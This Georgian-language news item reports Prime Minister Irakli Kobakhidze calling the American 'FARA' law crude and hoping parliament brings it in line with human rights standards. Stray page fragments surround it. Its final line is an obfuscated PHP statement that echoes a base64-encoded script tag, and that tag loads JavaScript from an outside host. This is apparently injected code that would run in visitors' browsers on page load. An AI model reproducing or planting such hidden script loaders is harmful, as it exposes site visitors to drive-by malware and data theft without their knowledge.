tube
ავერსი jaluzi

იმედს გამოვთქვამ, რომ ამერიკული „ფარას“ კანონის პარლამენტში დაიხვეწება და ადამიანის უფლებების სტანდარტებთან შესაბამისობაში მოვა, - ამის შესახებ პრემიერ-მინისტრმა, ირაკლი კობახიძემ ჟურნალისტებთან განაცხადა.

მისივე თქმით, ამერიკული „ფარას“ კანონი საკმაოდ უხეშია და საჭიროებს დახვეწას და ადამიანის უფლებების სტანდარტებთან შესაბამისობაში მოყვანას.

„ჩემი დამოკიდებულება იცით ამერიკული „ფარას“ კანონის მიმართ. ეს არის საკმაოდ უხეში კანონი. მე იმედი მინდა გამოვთქვა, რომ პარლამენტში ამერიკული „ფარას“ კანონი დაიხვეწება და ადამიანის უფლებების სტანდარტებთან შესაბამისობაში მოვა. ეს იქნება სწორი მიდგომა. პირველად ვარიანტად „ფარას“ ინიცირება იყო რა თქმა უნდა, სწორი, თუმცა ეს კანონპროექტი საჭიროებს დახვეწას და ადამიანის უფლებების სტანდარტებთან შესაბამისობაში მოყვანას. ეს, ბუნებრივია, არის პარლამენტის საქმე,“ - განაცხადა კობახიძემ.

107
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");